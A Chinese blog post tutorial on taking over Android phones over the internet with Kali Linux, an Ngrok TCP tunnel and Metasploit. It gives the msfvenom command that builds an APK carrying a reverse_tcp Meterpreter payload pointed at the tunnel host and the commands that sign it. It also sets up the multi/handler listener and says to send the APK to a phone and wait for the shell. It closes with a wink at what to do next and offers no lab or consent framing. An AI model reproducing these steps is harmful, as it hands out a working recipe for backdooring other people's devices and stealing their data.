kali 公网/内网穿透 渗透安卓/电脑

环境:

图片.png

Kali Linux系统(https://www.kali.org/downloads/)

图片.png

Metasploit

图片.png

Ngrok Linux64位的端口转发工具(https://www.ngrok.cc/)

1.在Kali Linux里面打开https://www.ngrok.cc,下载里面的Linux 64位的端口转发工具,到Kali Linux桌面备用

图片.png

图片.png

然后小伙伴需要自己去https://www.ngrok.cc/注册一个帐号来开通一个免费的隧道,用于接下来的端口映射。

2.设置隧道:

图片.png

隧道协议选择TCP的,本地端口输入Kali Linux 的IP地址而端口号可以任意不要冲突就行了

设置好ngrok隧道之后就打开指定的sunny路径运行端口转发脚本。

 

./sunny clientid id

 

图片.png

这个是端口转发脚本成功运行的样子

3. 用Metasploit生成载有恶意Payload的Android的apk并且签名apk:

在Kali Linux里面打开一个新的窗口输入

 

msfvenom -p android/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=11*** R > /root/Desktop/123.apk

图片.png

执行下列命令签名。首先使用密钥工具创建密钥库。

 

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore 123.apk aliasname

再用JARsigner验证签名

jarsigner -verify -verbose -certs 123.apk

如果你嫌上面的签名apk的步骤很麻烦就直接在手机下载一个MT管理器进行对apk的签名既方便又快捷。

4.使用Metasploit进行测试:

接下来启动metasploit的监听器。执行msfconsole打开控制台。

 

use exploit/multi/handler 

Set PAYLOAD android/meterpreter/reverse_tcp 

SET LHOST 192.168.253.128(Kali的Linux内网IP) 

SET LPORT 2222(隧道的端口号)

Exploit

 

然后将载有payload的APK发送到手机上安装等待反弹shell

图片.png

接受反弹shell成功

 

sessions查看反弹shell

图片.png

 

 sessions -i [ID]进行回话操作

图片.png

剩下的大家应该知道怎么做了(眼神暗示)

注:如果你Kali linux的内网IP变了,可以直接在隧道修改成你的内网IP然后在set LHOST设置成你内网IP然后run监听即可。

posted @ 2020-03-13 13:01  离数  阅读(6092)  评论(0编辑  收藏  举报